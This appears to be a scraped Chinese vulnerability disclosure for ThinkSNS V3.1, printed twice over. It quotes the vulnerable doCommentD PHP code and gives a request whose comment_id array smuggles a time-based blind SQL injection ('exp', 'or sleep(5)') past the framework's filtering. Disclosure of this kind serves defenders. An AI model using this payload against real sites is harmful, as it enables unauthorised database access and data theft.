VULHUB ™

### 简要描述： ThinkSNS 防御绕过注射 ### 详细说明： ``` public function doCommentD(){ if ( ($feed_id = intval($_POST['rowid'])) <= 0 ) { // $this->redirect(U('w3g/Index/index'), 3, '参数错误'); echo '参数错误'; exit; } if ( empty($_POST['content']) ) { // $this->redirect(U('w3g/Index/detail',array('feed_id'=>$feed_id)), 3, '内容不能为空'); // return ; echo '内容不能为空'; exit(); } //原微博的内容 $map['comment_id'] = $_POST['comment_id']; $preComment = M('Comment')->where($map)->find(); ``` 这里不多作赘述: 发送url: http://localhost/ThinkSNS_V3.1_20131108_28822/index.php?app=w3g&mod=Index&act=doCommentD postdata: rowid=1&content=xxxxxx&comment_id[0]=exp&comment_id[1]=%3d1)) or sleep/**/(5)# [<img src="https://images.seebug.org/upload/201501/291828485767c73bab628ebf4e2cdf81049a093a.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/291828485767c73bab628ebf4e2cdf81049a093a.png) ### 漏洞证明：

### 简要描述： ThinkSNS 防御绕过注射 ### 详细说明： ``` public function doCommentD(){ if ( ($feed_id = intval($_POST['rowid'])) <= 0 ) { // $this->redirect(U('w3g/Index/index'), 3, '参数错误'); echo '参数错误'; exit; } if ( empty($_POST['content']) ) { // $this->redirect(U('w3g/Index/detail',array('feed_id'=>$feed_id)), 3, '内容不能为空'); // return ; echo '内容不能为空'; exit(); } //原微博的内容 $map['comment_id'] = $_POST['comment_id']; $preComment = M('Comment')->where($map)->find(); ``` 这里不多作赘述: 发送url: http://localhost/ThinkSNS_V3.1_20131108_28822/index.php?app=w3g&mod=Index&act=doCommentD postdata: rowid=1&content=xxxxxx&comment_id[0]=exp&comment_id[1]=%3d1)) or sleep/**/(5)# [<img src="https://images.seebug.org/upload/201501/291828485767c73bab628ebf4e2cdf81049a093a.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/291828485767c73bab628ebf4e2cdf81049a093a.png) ### 漏洞证明：